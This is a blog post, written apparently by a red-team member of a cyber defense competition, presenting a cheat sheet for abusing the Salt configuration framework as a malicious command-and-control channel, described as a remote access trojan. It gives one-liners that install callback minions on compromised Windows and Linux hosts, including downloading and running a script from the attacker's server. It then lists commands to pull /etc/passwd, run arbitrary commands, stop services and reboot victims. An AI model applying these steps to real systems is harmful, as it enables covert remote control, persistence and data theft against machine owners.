Home Unlabelled Salt Command and Control Cheat Sheet

Salt Command and Control Cheat Sheet

By
Friday, June 03, 2016
Read
Add Comment
Recently, as an experiment, I used the Salt framework as a malicious command and control (C&C or C2) infrastructure at NCCDC. It was really successful, and made for a highly reliable and manageable remote access trojan. There is a ton of great documentation already out there on Salt, but I wanted to take a minute to jot down some of my notes for future C2 excellence.

I had most of my stuff staged on a local network, such that it would be easy to install and call back to the master without having to traverse The Internet. I also had my server set up to auto-accept all keys, so I could receive callbacks and execute commands quickly without having to bother with accepting keys (salt-key -L / salt-key -A). As each box would connect back, I would try to give it a unique name based on hostname and when it was connecting back. Once on a box, I would attempt to install my minions as quickly as possible, typically with one of the following one liners ready to go (broken out here). After that, your off to the races with your botnet army!

Minion Installers

On Windows:
PS C:\ > $name = "win_"+$(hostname)+"_"+$(Get-Date -Format s)
PS C:\ > Salt-Minion-x64.exe /S /master=10.0.0.2 /minion-name=$name /start-service=1

On Linux w/ apt-get:
$ apt-get install salt-minion salt-common
$ wget http://10.0.0.2/minion
$ mv ./minion /etc/salt/minion
$ sudo service salt-minion start
Or install from a script:
$ wget http://10.0.0.2/saltmin.sh
$ chmod +x saltmin.sh
$ NOW=$(date +"%m-%d-%YT%k:%M:%S")
$ saltmin.sh -P -I -i "linux_`hostname`_`echo $NOW`" -A 10.0.0.2

Command Execution

Show which minions that are up:
salt-run manage.up
Show minions that are down:
salt-run manage.down
Show all minions status:
salt-run manage.status
Test all minions connectivity:
salt '*' test.ping

Check if a process is running on all minions:
salt '*' ps.grep apache

Check if a file on all minions contains a string:
salt "*" file.contains /etc/password "admin"

Pull a file from a subgroup of minions:
salt "linux*" cp.push /etc/passwd

Send a file from the master to a subgroup of minions:
salt-cp "linux*" script_to_copy.py /target-dir/copy_of_script.py

Run arbitrary commands on a subgroup of minions:
salt "linux*" cmd.run "ls -lah /home/"

Get networking info from all minions:
salt '*' network.ip_addrs
More available network modules: 
network.ping, network.traceroute, network.get_hostname, network.mod_hostname

Get uptime of all minions:
salt '*' status.uptime

Reboot all minions:
salt '*' system.reboot

Service status:
salt '*' service.status
salt '*' service.start httpd
salt '*' service.stop httpd
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us